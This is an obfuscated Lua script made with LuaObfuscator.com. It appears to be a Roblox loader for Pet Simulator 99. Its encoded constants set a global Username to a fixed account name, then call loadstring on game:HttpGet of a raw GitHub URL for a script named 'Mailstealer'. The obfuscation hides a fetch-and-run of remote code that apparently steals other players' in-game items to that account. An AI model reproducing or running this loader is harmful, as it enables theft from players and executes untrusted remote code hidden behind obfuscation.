--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v68=0;while true do if (v68==0) then v19=v0(v3(v30,1,1));return "";end end else local v69=0;local v70;while true do if (v69==0) then v70=v2(v0(v30,16));if v19 then local v98=0;local v99;while true do if (v98==1) then return v99;end if (v98==0) then v99=v5(v70,v19);v19=nil;v98=1;end end else return v70;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v71=0 -0 ;local v72;while true do if (v71==(0 -(0 -0))) then v72=(v31/((3 -1)^(v32-(2 -(1066 -(68 + 997))))))%((621 -(555 + 64))^(((v33-1) -(v32-((2569 -(1523 + 114)) -(857 + 74)))) + (569 -(367 + 201)))) ;return v72-(v72%(928 -(214 + 713))) ;end end else local v73=(1 + 1)^(v32-(1 + 0 + 0)) ;return (((v31%(v73 + v73))>=v73) and (878 -(282 + 595))) or 0 ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + 2 );v18=v18 + (1272 -(226 + 1044)) ;return (v36 * (1114 -858)) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + (120 -(32 + (155 -70))) );v18=v18 + ((1311 -(87 + 263)) -(892 + 65)) ;return (v40 * ((40022743 -(67 + 113)) -23245347)) + (v39 * (47096 + 17130 + 1310)) + (v38 * 256) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=2 -1 ;local v44=(v20(v42,1 + 0 ,79 -59 ) * (((1745 -(368 + 423)) -(802 + (471 -321)))^(85 -53))) + v41 ;local v45=v20(v42,37 -(34 -(10 + 8)) ,23 + 8 );local v46=((v20(v42,1029 -(915 + 82) )==(2 -1)) and  -(1 + 0)) or (1 -0) ;if (v45==(1187 -(1069 + 118))) then if (v44==0) then return v46 * 0 ;else v45=1;v43=0 -0 ;end elseif (v45==(4477 -2430)) then return ((v44==(0 -0)) and (v46 * ((1 + 0)/(0 -0)))) or (v46 * NaN) ;end return v8(v46,v45-1023 ) * (v43 + (v44/(2^(52 + 0)))) ;end local function v25(v47)local v48;if  not v47 then v47=v23();if (v47==(442 -(416 + 26))) then return "";end end v48=v3(v16,v18,(v18 + v47) -(3 -2) );v18=v18 + v47 ;local v49={};for v66=1 + 0 , #v48 do v49[v66]=v2(v1(v3(v48,v66,v66)));end return v6(v49);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v50=0;local v51;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v50==2) then v55=nil;v56=nil;v50=3;end if ((581 -(361 + 219))~=v50) then else v53=nil;v54=nil;v50=2 -0 ;end if (v50~=(0 -0)) then else v51=0;v52=nil;v50=1 + 0 ;end if (v50==(1704 -(1419 + 281))) then while true do if (v51~=(2 -0)) then else local v94=74 -(71 + 3) ;local v95;while true do if (v94==(0 + 0)) then v95=0 -0 ;while true do if (v95==(1 -0)) then v51=244 -(187 + 54) ;break;end if (v95~=0) then else v56=nil;v57=nil;v95=1 + 0 ;end end break;end end end if (v51~=1) then else local v96=0;while true do if ((780 -(162 + 618))~=v96) then else v54=nil;v55=nil;v96=1;end if (v96==(1 + 0)) then v51=2 + 0 ;break;end end end if (v51~=(1 + 2)) then else v58=nil;while true do local v100=0 + 0 ;local v101;while true do if (v100~=(0 -0)) then else v101=738 -(542 + 196) ;while true do if (v101==1) then if (v52==1) then local v150=0;while true do if (v150~=(0 -0)) then else v56={v53,v54,nil,v55};v57=v23();v150=1637 -(1373 + 263) ;end if (v150==1) then v58={};v52=2 + 0 ;break;end end end if (v52==(1 + 1)) then local v151=0 -0 ;while true do if (v151~=(1000 -(451 + 549))) then else local v175=0;local v176;while true do if (v175==0) then v176=0 + 0 ;while true do if (0~=v176) then else for v195=1 -0 ,v57 do local v196=0;local v197;local v198;while true do if (v196~=(1552 -(1126 + 425))) then else if (v197==(1 -0)) then v198=v21()~=(1384 -(746 + 638)) ;elseif (v197==2) then v198=v24();elseif (v197==(2 + 1)) then v198=v25();end v58[v195]=v198;break;end if (v196~=(0 -0)) then else local v201=0 -0 ;while true do if (v201==(1121 -(118 + 1003))) then v197=v21();v198=nil;v201=1;end if (v201~=1) then else v196=342 -(218 + 123) ;break;end end end end end v56[3]=v21();v176=1582 -(1535 + 46) ;end if (v176==1) then v151=378 -(142 + 235) ;break;end end break;end end end if (v151==(1 + 0)) then for v184=1 + 0 ,v23() do local v185=977 -(553 + 424) ;local v186;while true do if (v185~=0) then else v186=v21();if (v20(v186,1,561 -(306 + 254) )==(0 + 0)) then local v188=0 -0 ;local v189;local v190;local v191;local v192;local v193;while true do if (v188==2) then v193=nil;while true do if (v189==(1469 -(899 + 568))) then while true do if (v190==(0 + 0)) then local v205=0 -0 ;while true do if (v205~=1) then else v190=1 + 0 ;break;end if (v205==(0 -0)) then v191=v20(v186,2,3);v192=v20(v186,607 -(268 + 335) ,296 -(60 + 230) );v205=2 -1 ;end end end if (v190==(573 -(426 + 146))) then local v206=0 + 0 ;while true do if (v206==(4 -3)) then v190=1458 -(282 + 1174) ;break;end if (v206==(811 -(569 + 242))) then v193={v22(),v22(),nil,nil};if (v191==(0 -0)) then local v211=0 -0 ;while true do if ((0 + 0)==v211) then v193[1027 -(706 + 318) ]=v22();v193[1206 -(373 + 829) ]=v22();break;end end elseif (v191==1) then v193[734 -(476 + 255) ]=v23();elseif (v191==(1132 -(369 + 761))) then v193[1254 -(721 + 530) ]=v23() -((1273 -(945 + 326))^16) ;elseif (v191~=3) then else local v220=0;local v221;while true do if (v220==(0 -0)) then v221=0 -0 ;while true do if ((0 + 0)==v221) then v193[3 -0 ]=v23() -((338 -(144 + 192))^(15 + 1)) ;v193[4]=v22();break;end end break;end end end v206=701 -(271 + 429) ;end end end if (v190==(2 + 0)) then local v207=1500 -(1408 + 92) ;while true do if (v207==(1 + 0)) then v190=1089 -(461 + 625) ;break;end if (v207~=(1580 -(1183 + 397))) then else if (v20(v192,1289 -(993 + 295) ,1 + 0 )~=(1 + 0)) then else v193[1977 -(1913 + 62) ]=v58[v193[2]];end if (v20(v192,2,1173 -(418 + 753) )~=(1 + 0)) then else v193[2 + 1 ]=v58[v193[1 + 2 ]];end v207=1 + 0 ;end end end if (v190==(1664 -(1477 + 184))) then if (v20(v192,3,3)~=1) then else v193[5 -1 ]=v58[v193[2 + 2 ]];end v53[v184]=v193;break;end end break;end if ((530 -(406 + 123))~=v189) then else local v204=1769 -(1749 + 20) ;while true do if ((0 + 0)==v204) then v192=nil;v193=nil;v204=857 -(564 + 292) ;end if (1==v204) then v189=1324 -(1249 + 73) ;break;end end end if (v189==(0 -0)) then v190=0 + 0 ;v191=nil;v189=1146 -(466 + 679) ;end end break;end if (v188==0) then v189=0 -0 ;v190=nil;v188=305 -(244 + 60) ;end if (v188==(2 -1)) then v191=nil;v192=nil;v188=1902 -(106 + 1794) ;end end end break;end end end v52=1 + 2 ;break;end end end break;end if (v101~=(0 + 0)) then else local v114=0 -0 ;while true do if (v114~=(0 -0)) then else if (v52==(114 -(4 + 110))) then local v177=584 -(57 + 527) ;local v178;local v179;while true do if (v177==1) then while true do if (v178==(1427 -(41 + 1386))) then v179=103 -(17 + 86) ;while true do if (v179~=(0 + 0)) then else local v199=1138 -(782 + 356) ;while true do if (v199==(0 + 0)) then v53={};v54={};v199=1;end if (v199==(268 -(176 + 91))) then v179=1 -0 ;break;end end end if ((2 -1)~=v179) then else v55={};v52=167 -(122 + 44) ;break;end end break;end end break;end if (v177~=0) then else v178=0;v179=nil;v177=1 -0 ;end end end if (v52==(9 -6)) then local v180=1875 -(157 + 1718) ;local v181;while true do if (v180~=(0 + 0)) then else v181=0 + 0 ;while true do if (v181==0) then local v194=0 + 0 ;while true do if (v194==(0 -0)) then for v202=1,v23() do v54[v202-1 ]=v28();end return v56;end end end end break;end end end v114=1 -0 ;end if (v114==(66 -(30 + 35))) then v101=1019 -(697 + 321) ;break;end end end end break;end end end break;end if (v51==(0 + 0)) then local v97=0;while true do if (v97~=(0 -0)) then else v52=1257 -(1043 + 214) ;v53=nil;v97=1;end if (v97~=(3 -2)) then else v51=1;break;end end end end break;end if (v50==(1215 -(323 + 889))) then v57=nil;v58=nil;v50=10 -6 ;end end end local function v29(v59,v60,v61)local v62=0;local v63;local v64;local v65;while true do if (0==v62) then v63=v59[1];v64=v59[2];v62=1;end if (v62==1) then v65=v59[3];return function(...)local v77=v63;local v78=v64;local v79=v65;local v80=v27;local v81=1;local v82= -1;local v83={};local v84={...};local v85=v12("#",...) -1 ;local v86={};local v87={};for v91=0,v85 do if (v91>=v79) then v83[v91-v79 ]=v84[v91 + 1 ];else v87[v91]=v84[v91 + 1 ];end end local v88=(v85-v79) + 1 ;local v89;local v90;while true do v89=v77[v81];v90=v89[1];if (v90<=5) then if (v90<=2) then if (v90<=0) then local v106=0;local v107;local v108;local v109;local v110;local v111;while true do if (v106==0) then v107=nil;v108,v109=nil;v110=nil;v111=nil;if ((v89[3]=="_ENV") or (v89[3]=="getfenv")) then v87[v89[2]]=v61;else v87[v89[2]]=v61[v89[3]];end v106=1;end if (v106==6) then v81=v89[3];break;end if (4==v106) then for v152=v111,v82 do local v153=0;while true do if (v153==0) then v107=v107 + 1 ;v87[v152]=v108[v107];break;end end end v81=v81 + 1 ;v89=v77[v81];v111=v89[2];v87[v111]=v87[v111](v13(v87,v111 + 1 ,v82));v106=5;end if (v106==3) then v89=v77[v81];v111=v89[2];v108,v109=v80(v87[v111](v13(v87,v111 + 1 ,v89[3])));v82=(v109 + v111) -1 ;v107=0;v106=4;end if (v106==2) then v87[v111]=v110[v89[4]];v81=v81 + 1 ;v89=v77[v81];v87[v89[2]]=v89[3];v81=v81 + 1 ;v106=3;end if (v106==1) then v81=v81 + 1 ;v89=v77[v81];v111=v89[2];v110=v87[v89[3]];v87[v111 + 1 ]=v110;v106=2;end if (v106==5) then v81=v81 + 1 ;v89=v77[v81];v87[v89[2]]();v81=v81 + 1 ;v89=v77[v81];v106=6;end end elseif (v90>1) then local v115=0;while true do if (v115==2) then v89=v77[v81];v87[v89[2]]=v89[3];v81=v81 + 1 ;v89=v77[v81];v115=3;end if (v115==0) then v61[v89[3]]=v87[v89[2]];v81=v81 + 1 ;v89=v77[v81];v87[v89[2]]=v89[3]~=0 ;v115=1;end if (v115==3) then v81=v89[3];break;end if (v115==1) then v81=v81 + 1 ;v89=v77[v81];v61[v89[3]]=v87[v89[2]];v81=v81 + 1 ;v115=2;end end else local v116=0;local v117;local v118;while true do if (v116==0) then v117=v89[2];v118=v87[v89[3]];v116=1;end if (v116==1) then v87[v117 + 1 ]=v118;v87[v117]=v118[v89[4]];break;end end end elseif (v90<=3) then v61[v89[3]]=v87[v89[2]];elseif (v90==4) then v87[v89[2]]=v89[3];else v87[v89[2]]();end elseif (v90<=8) then if (v90<=6) then if ((v89[3]=="_ENV") or (v89[3]=="getfenv")) then v87[v89[2]]=v61;else v87[v89[2]]=v61[v89[3]];end elseif (v90==7) then local v124=v89[2];v87[v124]=v87[v124](v13(v87,v124 + 1 ,v82));else do return;end end elseif (v90<=10) then if (v90==9) then if (v87[v89[2]]==v89[4]) then v81=v81 + 1 ;else v81=v89[3];end else v81=v89[3];end elseif (v90>11) then local v127=v89[2];local v128,v129=v80(v87[v127](v13(v87,v127 + 1 ,v89[3])));v82=(v129 + v127) -1 ;local v130=0;for v148=v127,v82 do local v149=0;while true do if (v149==0) then v130=v130 + 1 ;v87[v148]=v128[v130];break;end end end else v87[v89[2]]=v89[3]~=0 ;end v81=v81 + 1 ;end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!093O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034B3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F45676F72696B7573612F50657453696D756C61746F722O392F6D61696E2F4D61696C737465616C657203083O00557365726E616D6503083O006475633132373438030A3O004C6F61645363722O656E00143O0012043O00013O0026093O000B0001000200040A3O000B0001001206000100033O00122O000200043O00202O00020002000500122O000400066O000200046O00013O00024O00010001000100044O001300010026093O00010001000100040A3O00010001001204000100083O001202000100076O000100013O00122O000100093O00124O00023O00044O000100012O00083O00017O00",v9(),...);
